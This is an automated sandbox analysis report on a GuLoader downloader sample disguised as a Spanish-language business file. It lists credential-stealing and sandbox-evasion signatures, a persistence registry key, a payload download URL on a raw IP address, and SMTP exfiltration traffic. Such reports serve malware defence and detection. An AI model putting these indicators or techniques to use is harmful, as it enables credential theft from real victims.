Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe

Overview

General Information

Sample name:CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
Analysis ID:1510346
MD5:c6c117c18fead29fb0e5393139d0b0f2
SHA1:73a18e382de6516dac2ffb386a7fbcbcd3bb4101
SHA256:65a95ebb11d9f2916453cb3c2b7e45b583ba360af7bfd915547de103b78cfe5e
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.7577422376.0000000035D65000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2974737603.00000000075B2000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Cretinous\Adjudanter.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, ProcessId: 6816, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Motorcyclists
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, Initiated: true, ProcessId: 6816, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49717
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-09-12T21:29:58.677580+020028032702Potentially Bad Traffic192.168.11.2049715107.150.18.10980TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeAvira: detected
      Source: http://107.150.18.109/vqdVIxqzrFAaCMWDM41.binAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Roaming\Cretinous\Adjudanter.exeAvira: detection malicious, Label: HEUR/AGEN.1333748
      Source: C:\Users\user\AppData\Roaming\Cretinous\Adjudanter.exeReversingLabs: Detection: 36%
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeReversingLabs: Detection: 36%
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Windows.Forms.pdb source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7581746956.000000007115B000.00000020.00000001.01000000.0000000B.sdmp
      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7581746956.000000007115B000.00000020.00000001.01000000.0000000B.sdmp
      Source: Binary string: System.Windows.Forms.ni.pdb source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7581746956.000000007115B000.00000020.00000001.01000000.0000000B.sdmp
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_0040287E FindFirstFileW,0_2_0040287E
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_00406555 FindFirstFileW,FindClose,3_2_00406555
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_0040287E FindFirstFileW,3_2_0040287E
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405A03
      Source: global trafficTCP traffic: 192.168.11.20:49717 -> 185.230.214.164:587
      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 185.230.214.164 185.230.214.164
      Source: Joe Sandbox ViewASN Name: HOST-AS-APHostUniversalPtyLtdAU HOST-AS-APHostUniversalPtyLtdAU
      Source: unknownDNS query: name: ip-api.com
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49715 -> 107.150.18.109:80
      Source: global trafficTCP traffic: 192.168.11.20:49717 -> 185.230.214.164:587
      Source: global trafficHTTP traffic detected: GET /vqdVIxqzrFAaCMWDM41.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 107.150.18.109Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: unknownTCP traffic detected without corresponding DNS query: 107.150.18.109
      Source: global trafficHTTP traffic detected: GET /vqdVIxqzrFAaCMWDM41.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 107.150.18.109Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: ip-api.com
      Source: global trafficDNS traffic detected: DNS query: smtp.zoho.eu
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.0000000005909000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7567458814.00000000073C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://107.150.18.109/vqdVIxqzrFAaCMWDM41.bin
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.0000000005909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.150.18.109/vqdVIxqzrFAaCMWDM41.bin9
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000059AD000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000059AD000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.0000000005990000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000059AD000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7577422376.0000000035D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7577422376.0000000035D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000000.00000000.2476495391.000000000040A000.00000008.00000001.01000000.00000003.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.0000000005990000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7577422376.0000000035D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000059AD000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://status.thawte.com0:
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000059AD000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7577422376.0000000035DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.0000000005990000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000059AD000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054B0
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040344A
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile created: C:\Windows\resources\0409Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_004068DA0_2_004068DA
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_00404CED0_2_00404CED
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_004068DA3_2_004068DA
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_00404CED3_2_00404CED
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_001139283_2_00113928
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_001149403_2_00114940
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_0011C4403_2_0011C440
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_00118FC83_2_00118FC8
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_001140703_2_00114070
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_38779C303_2_38779C30
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_387724A03_2_387724A0
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_38774FD03_2_38774FD0
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_3877AF983_2_3877AF98
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_387760803_2_38776080
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_3877D4883_2_3877D488
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_387745D83_2_387745D8
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_38776DBF3_2_38776DBF
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_38770A183_2_38770A18
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_388500403_2_38850040
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_001190803_2_00119080
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_0011C7E83_2_0011C7E8
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: String function: 00402C53 appears 51 times
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeStatic PE information: invalid certificate
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7581746956.000000007063B000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.0000000005909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/14@2/3
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040344A
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_00404771 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404771
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsensJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeMutant created: NULL
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile created: C:\Users\user\AppData\Local\Temp\nsc266A.tmpJump to behavior
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
